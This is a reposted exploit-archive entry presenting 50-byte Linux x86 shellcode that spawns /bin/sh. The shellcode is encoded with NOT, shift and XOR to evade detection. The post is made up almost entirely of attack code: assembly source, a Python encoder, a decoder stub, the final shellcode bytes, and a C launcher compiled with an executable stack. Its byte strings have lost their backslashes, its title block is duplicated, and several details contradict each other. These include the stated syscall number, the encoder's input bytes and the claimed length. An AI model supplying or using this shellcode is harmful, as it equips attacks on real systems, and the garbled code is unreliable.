Linux x86 execve bin sh NOT SHIFT-N XOR-N Encoded Shellcode

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 276

/*
# Title: Linuxx86 (NOT +SHIFT-N+ XOR-N) + encoded (/bin/sh) Shellcode (50 byes)
# Author: Pedro Cabral
# Purpose: spawn /bin/sh shell
# Tested On: Ubuntu 16.04.01 LTS
/*
# Title: Linuxx86 (NOT +SHIFT-N+ XOR-N) + encoded (/bin/sh) Shellcode (50 byes)
# Author: Pedro Cabral
# Purpose: spawn /bin/sh shell
# Tested On: Ubuntu 16.04.01 LTS
# Arch: x86
# Size: 50 bytes

##################################### sh.asm ######################################

global _start

section .text
_start:

xor eax, eax ; reseting the register
push eax ; pushing null terminator
push 0x68732f2f ; push /bin//sh
push 0x6e69622f
mov ebx, esp ; ebx = /bin//sh
push eax
mov edx, esp ; envp = 0
push ebx
mov ecx, esp ; argv = [filename,0]
mov al, 11 ; syscall 12 (execve)
int 0x80 ; syscall

############################# original shellcode ####################################

pedro@ubuntu:~$ nasm -f elf32 sh.asm
pedro@ubuntu:~$ ld -N -o sh sh.o
pedro@ubuntu:~$ echo;objdump -d ./sh|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr ' ' ' '|sed 's/ $//g'|sed 's/ /\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo

"x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x89xe2x53x89xe1xb0x0bxcdx80"

################################# encode.py #####################################

#!/usr/bin/python

import sys

if len(sys.argv) != 3:
print "Usage : python encode.py <SHIFT number> <XOR number>"
sys.exit(0)

shift = int(sys.argv[1])
xor = int(sys.argv[2])

#shellcode = (
#"x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x89"
#"xe2x53x89xe1xb0x0bxcdx80")

shellcode = ("x31xc0x50x68x6ex2fx73x68x68x2fx2fx62x69x89xe3x50x89xe2x53x89xe1xb0x0bxcdx80")

# addition to the inicial of the shellcode the SHIFT and XOR values
encoded_shellcode =""
encoded_shellcode += '0x'
encoded_shellcode += '%02x, ' %shift
encoded_shellcode += '0x'
encoded_shellcode += '%02x, ' %xor

# [NOT + SHL-N + XOR-N] encoded shellcode
for i in bytearray(shellcode):
new = ~i & 0xff
new = new << shift
new = new ^ xor
encoded_shellcode += '0x'
encoded_shellcode += '%02x, ' %new

# end of shellcode
encoded_shellcode += '0x'
encoded_shellcode += '%02x, ' %xor

# print encoded shellcode
print encoded_shellcode

#################################### Encoded Shellcode ##########################################

pedro@ubuntu:~$ python encode.py 4 1337
0x04, 0x539, 0x9d9, 0x6c9, 0xfc9, 0xc49, 0xc29, 0x839, 0xdf9, 0xc49, 0xc49, 0x839, 0x839, 0xce9, 0xc59, 0x259, 0x4f9, 0xfc9, 0x259, 0x4e9, 0xff9, 0x259, 0x4d9, 0x1c9, 0xa79, 0x619, 0x2c9, 0x539,

#################################### decoder.asm ###############################################

global _start

section .text

_start:

jmp short enc

decoder:
xor ecx,ecx
mul ecx

pop esi
mov cx,[esi]
inc esi
inc esi
mov bx, [esi]
inc esi
inc esi

push esi
mov edi, esi
main:

mov ax,[esi]
xor ax, bx
jz call_decoded
shr ax, cl
not word ax
mov [edi], al
inc esi
inc esi
inc edi
jmp short main

call_decoded:
call [esp]

enc:
call decoder
encoded: dw 0x04, 0x539, 0x9d9, 0x6c9, 0xfc9, 0xc49, 0xc29, 0x839, 0xdf9, 0xc49, 0xc49, 0x839, 0x839, 0xce9, 0xc59, 0x259, 0x4f9, 0xfc9, 0x259, 0x4e9, 0xff9, 0x259, 0x4d9, 0x1c9, 0xa79, 0x619, 0x2c9, 0x539

######################################### final shellcode ###########################################

pedro@ubuntu:~/encoded$ nasm -f elf32 decoder.asm
pedro@ubuntu:~/encoded$ ld -o decoder decoder.o
pedro@ubuntu:~/encoded$ echo;objdump -d ./decoder|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr ' ' ' '|sed 's/ $//g'|sed 's/ /\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo

"xebx2ax31xc9xf7xe1x5ex66x8bx0ex46x46x66x8bx1ex46x46x56x89xf7x66x8bx06x66x31xd8x74x0dx66xd3xe8x66xf7xd0x88x07x46x46x47xebxebxffx14x24xe8xd1xffxffxffx04x00x39x05xd9x09xc9x06xc9x0fx49x0cx29x0cx39x08xf9x0dx49x0cx49x0cx39x08x39x08xe9x0cx59x0cx59x02xf9x04xc9x0fx59x02xe9x04xf9x0fx59x02xd9x04xc9x01x79x0ax19x06xc9x02x39x05"

pedro@ubuntu:~/encoded$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
pedro@ubuntu:~/encoded$ ./shellcode
Shellcode Length: 50
$ whoami
pedro
*/

#include<stdio.h>
#include<string.h>

unsigned char code[] =
"xebx2ax31xc9xf7xe1x5ex66x8bx0ex46x46x66x8bx1ex46x46x56x89xf7x66x8bx06x66x31xd8x74x0dx66xd3xe8x66xf7xd0x88x07x46x46x47xebxebxffx14x24xe8xd1xffxffxffx04x00x39x05xd9x09xc9x06xc9x0fx49x0cx29x0cx39x08xf9x0dx49x0cx49x0cx39x08x39x08xe9x0cx59x0cx59x02xf9x04xc9x0fx59x02xe9x04xf9x0fx59x02xd9x04xc9x01x79x0ax19x06xc9x02x39x05";

void main()
{

printf("Shellcode Length: %d ", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}